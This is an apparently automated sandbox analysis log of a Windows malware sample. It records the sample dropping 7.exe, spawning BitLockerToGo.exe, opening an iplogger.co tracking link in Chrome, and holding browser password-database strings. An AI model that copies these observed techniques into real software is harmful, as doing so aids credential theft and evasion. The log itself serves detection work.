                    Source: C:\Users\user\AppData\Local\Temp\7.exeFile opened: C:\Windows\system32\bddbe6f39145a1954405523f0fca27ae195d52fef561ed3cde21e801955fd2faAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
                    Source: dlcdkJcbbV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: dlcdkJcbbV.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.000000000420B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: dlcdkJcbbV.exeReversingLabs: Detection: 71%
                    Source: dlcdkJcbbV.exeVirustotal: Detection: 78%
                    Source: unknownProcess created: C:\Users\user\Desktop\dlcdkJcbbV.exe "C:\Users\user\Desktop\dlcdkJcbbV.exe"
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLub
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2012,i,18138774805082086482,6084898120708569672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess created: C:\Users\user\AppData\Local\Temp\7.exe "C:\Users\user\AppData\Local\Temp\7.exe"
                    Source: C:\Users\user\AppData\Local\Temp\7.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2012,i,18138774805082086482,6084898120708569672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLubJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess created: C:\Users\user\AppData\Local\Temp\7.exe "C:\Users\user\AppData\Local\Temp\7.exe" Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2012,i,18138774805082086482,6084898120708569672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2012,i,18138774805082086482,6084898120708569672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32Jump to behavior
                    Source: Google Drive.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: YouTube.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Sheets.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Gmail.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Slides.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Docs.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: dlcdkJcbbV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: dlcdkJcbbV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: dlcdkJcbbV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: BitLockerToGo.pdb source: 7.exe, 00000008.00000002.2707050194.000000C000500000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000002.2707050194.000000C00053A000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000003.2701092302.000002256AD60000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000002.2707693231.000000C0005C4000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: BitLockerToGo.pdbGCTL source: 7.exe, 00000008.00000002.2707050194.000000C000500000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000002.2707050194.000000C00053A000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000003.2701092302.000002256AD60000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000002.2707693231.000000C0005C4000.00000004.00001000.00020000.00000000.sdmp
                    Source: dlcdkJcbbV.exeStatic PE information: 0xEF742721 [Sun Apr 21 07:13:37 2097 UTC]
                    Source: 7.exe.0.drStatic PE information: section name: .xdata
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_051C208F push edi; retf 0_2_051C2096
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_051CD912 push eax; ret 0_2_051CD921
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_06376C20 push es; ret 0_2_06376C30
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_06373C60 push eax; iretd 0_2_06373C61
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_06373812 push eax; retf 0_2_06373819
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 0_2_06373848 pushfd ; retf 0_2_06373849
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03243439 push 00000025h; iretd 9_2_0324343B
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03241B92 push eax; ret 9_2_03241B93
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile created: C:\Users\user\AppData\Local\Temp\7.exeJump to dropped file
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
